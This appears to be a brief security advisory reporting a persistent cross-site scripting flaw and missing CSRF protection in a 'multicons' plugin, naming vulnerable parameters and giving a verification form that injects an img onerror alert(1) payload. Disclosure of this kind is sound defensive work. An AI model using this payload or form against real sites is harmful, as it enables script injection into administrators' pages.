Hello,
1. Persistent Cross-Site Scripting (XSS)
Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).
Method: POST
Vulnerable parameters: global_url, admin_url, etc...
Example PHP callstack:
personal_setup_page [/multicons/multicons.php:86]
Verification:
--
<input type="text" name="global_url" value='"><img src=x onerror=alert(1) />' />
<input type="text" name="update" value='1' />
<input type="submit" name="submit" />
</form>
--
--
Regards,
Marcin Probola,